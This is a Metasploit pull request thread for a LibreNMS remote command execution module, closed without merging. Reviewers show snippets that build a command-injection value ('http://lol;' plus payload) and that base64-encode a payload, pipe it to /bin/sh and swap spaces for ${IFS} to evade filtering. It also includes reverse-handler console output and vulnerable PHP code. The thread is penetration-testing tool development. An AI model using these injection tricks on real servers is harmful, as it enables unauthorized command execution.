Add a librenms rce
rapid7/metasploit-framework pull request #9213
Opened 2017-11-16 11:14 UTC by jvoisin

# Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use multi/http/librenms_rce`
- [ ] `set cmd id`
- [ ] Set `RHOST`, `RPORT`
- [ ] `set payload cmd/unix/generic`
- [ ] `run`
- [ ] **Verify** that your get the admin cookie
- [ ] **Verify** the that your get your command's output

I'll push the documentation in a couple of hours (worst case, this week-end)

2017-11-16 15:38 UTC, wwebb-r7 commented
The disclosure date format is causing the build failure.  As far as the tabbed indent warnings, they should be ok, but I'll let someone else weigh in.  High five for including docs the first time around.

2017-11-16 19:36 UTC, wvu-r7 commented
That disclosure date is, like, objectively better. We should totally allow it.

2017-11-16 19:37 UTC, busterb commented
I'm a fan.

2017-11-16 22:27 UTC, wwebb-r7 commented
Also in favor as I always, _always_ fail this check myself

2017-11-20 08:20 UTC, jvoisin commented
Shall I fix the date, or wait until it's allowed?

2017-11-20 08:51 UTC, bcoles commented
@jvoisin please fix the date.

A change from the Metasploit date format to the vastly superior international date format is not going to happen any time soon. Should you choose to wait, you might be waiting a while.

2017-11-20 10:11 UTC, bcoles requested changes
Please use spaces instead of tabs for indentation.

2017-11-20 10:11 UTC, bcoles commented on documentation/modules/exploit/multi/http/librenms_rce.md
> +  5. Do: `set cmd id`
6

2017-11-20 10:11 UTC, bcoles commented on documentation/modules/exploit/multi/http/librenms_rce.md
> +  6. Do: `exploit`
7

2017-11-20 10:11 UTC, bcoles commented on modules/exploits/multi/http/librenms_rce.rb
> +      'References'     => [ ],
The `References` array can be used to mention the PR patch URL `https://github.com/librenms/librenms/pull/7511` and any other relevant URLs.

2017-11-20 10:11 UTC, bcoles commented on modules/exploits/multi/http/librenms_rce.rb
> +				'query' => 'http://lol;' + custom_payload
Consider randomizing the `query` URL with `Rex::Text.rand_text_alpha`

2017-11-26 05:42 UTC, bcoles requested changes

2017-11-26 05:42 UTC, bcoles commented on documentation/modules/exploit/multi/http/librenms_rce.md
> +## Demonstration
Can you provide example output of running this with a regular bind/reverse shell payload?

Although the `CMD` exploitation, and subsequent returning of the command results is cute, I suspect users will generally want to aim and fire a full-auto bind/reverse payload.

2017-11-26 05:42 UTC, bcoles commented on modules/exploits/multi/http/librenms_rce.rb
> +      'References'     => [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
`References` needs to be a two dimensional array:

```ruby
'References'     => [
  [ 'URL', 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b' ],
],
```

2017-11-26 05:42 UTC, bcoles commented on modules/exploits/multi/http/librenms_rce.rb
> +end
Is it possible to write a [`check` method](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-check()-method)?

I haven't reviewed the bug yet. Off the top of my head, here's some things you could check for:

* Is the `install.php` file left after installation? Does it exist? (return `Detected`)
* If the `install.php` file exists, can you infer if the software is vulnerable based only on a version number? (return `Detected` or `Appears`); or
* Can you check if the auth bypass is possible? Do you get an admin cookie? (return `Vulnerable`)

2017-11-27 18:18 UTC, jvoisin commented on documentation/modules/exploit/multi/http/librenms_rce.md
> +## Demonstration
It fails with something else than a `CMD`, I didn't managed to understand why :/

2017-11-28 13:50 UTC, bcoles commented on modules/exploits/multi/http/librenms_rce.rb
> +      ]
Missing a `,` - causing the build to fail

2017-11-28 14:02 UTC, bcoles commented on documentation/modules/exploit/multi/http/librenms_rce.md
> +## Demonstration
Uh that's not good. The module should leverage existing metasploit payloads where possible. The raw `CMD` payloads are usually reserved for restricted environments such as embedded devices where gaining a shell is tricky, or as a nice-to-have addition to the regular payloads for execution of custom commands.

In this case, it's most likely due to a bad character, and based on your usage of `${IFS}` I would assume that whitespace is to blame.

To get around this, you could try specifying `\x20` as a bad character in `BadChars` and see if the payloads can automagically choose an appropriate encoder.

If the CMD payloads can't encode the payload, you could try encoding it yourself. Here's a couple of options:

```ruby
# Base64 encode the payload and pipe to /bin/sh
# - Note that this requires the base64 binary on the target host
# - Note that `base64 -d` is used, which only works on real operating systems. It won't work on Mac which uses `base64 --decode` or `base64 -D` or something else equally stupid.
custom_payload = "echo${IFS}#{Base64.strict_encode64(payload.encoded)}|base64${IFS}-d|/bin/sh"
# ...
'query' => 'http://' + Rex::Text.rand_text_alpha(4, 8) + ';' + custom_payload
```

```ruby
# Replace all whitespace with ${IFS}
custom_payload = payload.encoded.to_s.gsub(/\s+/, "${IFS}")
# ...
'query' => 'http://' + Rex::Text.rand_text_alpha(4, 8) + ';' + custom_payload
```

2017-11-28 14:24 UTC, bcoles commented on modules/exploits/multi/http/librenms_rce.rb
> +        [ 'https://github.com/librenms/librenms/commit/1205f12f10a87f50a9a9127ab3caea861bff91b9'],
Nooo the `,` is in the wrong spot. That just made the CI angrier!

2018-01-16 21:01 UTC, wchen-r7 commented
@jvoisin  I am actually not able to get this module to work.

Here is my output:

```
msf exploit(librenms_rce) > run

[*] Started reverse TCP double handler on 172.16.249.1:4444 
[*] Getting admin cookie...
[*] Got admin cookie: PHPSESSID=cok15jo776fu16j4qeti69ohq6;
[*] Exploit completed, but no session was created.
msf exploit(librenms_rce) > 
```

In addition, the response of the last netcmd request was "unauthenticated", which comes from this auth check in netcmd.php:

```php
if (!$_SESSION['authenticated']) {
    echo 'unauthenticated';
    exit;
}
```

That means the session injection didn't work. So I looked at install.php (where your reported vuln was):

```
session_start();
if (empty($_POST) && !empty($_SESSION) && !isset($_REQUEST['stage'])) {
    $_POST = $_SESSION;
} elseif (!file_exists("../config.php")) {
    $_SESSION = array_replace($_SESSION, $_POST);
}
```

To inject $_SESSION with $_POST, it looks like I need to remove config.php... but that means the application is in the pre-installation state. Doesn't sound right because that's not mentioned in the module description or documentation.

@jvoisin Could you please elaborate on how you set up your vulnerable environment? Thanks!

2018-01-26 10:11 UTC, jvoisin commented
I don't have currently the time to setup a complete environment to debug this :/
I'll re-open this if/when I do, sorry.

2018-01-26 10:11 UTC, closed without merging